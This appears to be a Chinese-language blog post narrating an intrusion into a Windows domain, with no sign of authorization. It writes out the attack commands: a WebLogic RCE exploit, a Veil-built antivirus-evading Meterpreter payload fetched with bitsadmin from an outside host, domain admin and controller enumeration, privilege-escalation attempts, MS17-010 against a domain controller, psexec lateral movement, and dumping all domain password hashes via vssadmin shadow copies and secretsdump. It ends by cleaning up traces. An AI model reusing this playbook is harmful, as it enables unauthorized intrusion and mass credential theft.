直接用WebLogic_Wls-Wsat_RCE_Exp.jar
exp获取到shell,和上上篇文章一样。
hostname -->BX1 |
像开始说的,我是没有注意到WRSA.exe
这款杀软,但是习惯性的用了Veil生成msf的exp
,恰好又能过(virustotal.com)
利用bitsadmin
命令将exp
上传到目标机
bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe
msf
监听并反弹meterpreter的shell
这里和 Weblogic引发的血案-2有点像,哈哈哈,入口点都一样。
先收集一下域信息,找找域管,找找域控。
net group 查看组名 |
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain Kx.
Members
-------------------------------------------------------------------------------
xxxx Administrator xxxx
kxadmin xxxx xxxx
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>nltest /dclist:Kx
nltest /dclist:K2x
Get list of DCs in domain 'Kx' from '\\AD1.Kx'.
AD1.Kx [PDC] [DS] Site: Default-First-Site-Name
AD2.Kx [DS] Site: Default-First-Site-Name
AD3.Kx [DS] Site: Default-First-Site-Name
说明:xxxx代表的是马赛克
利用ping
命令得到域控IP
AD1.Kx -->192.168.2.225 域控 |
该机子的管理员组可能存在有域管账号,如果能抓出哈希岂不是美滋滋?但是当前权限不是NT AUTHORITY\SYSTEM
所以msf加载的mimikatz是抓不出哈希的
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net localgroup administrators |
提权啊
综合上述,这里有个问题就是判断域管的时候留下的,就是执行net localgroup administrators
显示有kx\kxadmin
管理员用户,然后执行net group "domain admins" /domain
查看域管当中也有kxadmin
用户,这是kx\kxadmin迷惑了我(kx是域控),注意这个账号的格式是域控\账号,这里和远程登入域机器的时候输入域管账号一样,格式也是域控\账号。所以这里的kx\admin
账号是域管的概率很大,因为它标识了。总的来说,验证的方法也很简单,就是读取kx\kxadmin
的密码,能登入域控的话就是域管账号了。
好久没有提权了,记得上次用pr.exe
提了台机子还是半年前的事。
在目标价执行systeminfo>1.txt,然后将1.txt拖回本地
python windows-exploit-suggester.py --database 2018-04-10-mssb.xls --systeminfo 1.txt |
这里只截取了一小部分的图,绿色代表可以利用的提权工具,
运行ms15-051.exe
结果懵逼了
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>ms15-051.exe "net user admin1 Qqaazz7 |
当时第一反应就是被杀了,再一次看了进程才发现有个WRSA.exe
杀软,好吧,第一次遇到,没注意。
Webroot杀软
手上也没有免杀的提权工具,这就很难受了。
用msf
自带的试试,search了几个15 16的提权模块,设置session之后 run!
然而并没有用,meterpreter迁移进程
和getsystem
也不管用
提权难啊提权难
还在为提权想办法时,扫内网发现了192.168.2.245域控存在ms17-010!这次你还不死。
添加用户怼!
迫不得已的时候才用这招,当时登入的时候还被挤下线了,好采对方没发觉什么。
不是明文的,cmd5可破。
利用该域控上线个cs
然后arp
登入一波域内机子就差不多完事了,但是死活上线不了,各种姿势都试过了,就是不给你上线,exp
在进程里面了就是不给你上线(能通外网),刚开始以为是该域控环境有问题,所以就拿着域管登入到其他两个域控,还是不给上线,行吧,我在换多几台试试总可以了吧?换了不下十台机子,就是不给你上线,好气。最后以为是自己的Cobalt Strike
有问题,本地运行下exp
结果秒上线,狗噢。
都说Cobalt Strike
是msf
的界面版,那我改用msf
总行吧。
添加msf
路由,使得msf
能访问到目标内网,
登入域里的机器,使用到的模块
use exploit/windows/smb/psexec |
设置对应的SMBDomain,SMBUer,SMBPass
,run登入。结果三台域控没上线,只上线了两台,当时忘截图了,心累。
获取NTDS.dit文件,导出域控里全部域用户哈希。导出方式
C:\Windows\System32>vssadmin create shadow /for=c: |
将NTDS.dit,system,sam
三个文件拖回kali
里,DUMP NTDS.dit文件
python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/SYSTEM LOCAL |
说明:这里一定要在/root/下创建ntds_cracking
目录然后将ntds.dit
放到该目录,路径是/root/ntds_cracking/ntds.dit 不然会报错。
老规矩,擦屁股走人~
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.